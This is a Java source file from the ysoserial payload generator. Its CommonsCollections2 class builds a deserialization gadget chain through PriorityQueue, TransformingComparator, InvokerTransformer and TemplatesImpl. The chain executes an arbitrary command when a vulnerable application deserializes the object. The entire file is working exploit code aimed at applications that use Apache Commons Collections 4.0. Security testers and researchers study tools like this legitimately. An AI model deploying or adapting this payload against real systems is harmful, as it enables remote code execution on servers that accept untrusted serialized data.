1
package ysoserial.payloads;
2

3
import java.util.PriorityQueue;
4
import java.util.Queue;
5

6
import org.apache.commons.collections4.comparators.TransformingComparator;
7
import org.apache.commons.collections4.functors.InvokerTransformer;
8

9
import ysoserial.payloads.annotation.Dependencies;
10
import ysoserial.payloads.util.Gadgets;
11
import ysoserial.payloads.util.PayloadRunner;
12
import ysoserial.payloads.util.Reflections;
13

14
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
15

16
/*
17
	Gadget chain:	
18
		ObjectInputStream.readObject()
19
			PriorityQueue.readObject()
20
				...
21
					TransformingComparator.compare()
22
						InvokerTransformer.transform()
23
							Method.invoke()
24
								Runtime.exec()
25
 */
26

27
@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
28
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
29
public class CommonsCollections2 implements ObjectPayload<Queue<Object>> { 
30

31
	public Queue<Object> getObject(final String command) throws Exception {		
32
		final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
33
		// mock method name until armed
34
		final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
35
		
36
		// create queue with numbers and basic comparator
37
		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer)); 
38
		// stub data for replacement later
39
		queue.add(1); 
40
		queue.add(1); 
41
		
42
		// switch method called by comparator
43
		Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 
44
		
45
		// switch contents of queue
46
		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
47
		queueArray[0] = templates;
48
		queueArray[1] = 1;
49
		
50
		return queue;
51
	}
52
	
53
	public static void main(final String[] args) throws Exception {
54
		PayloadRunner.run(CommonsCollections2.class, args);
55
	}
56

57
}
58

59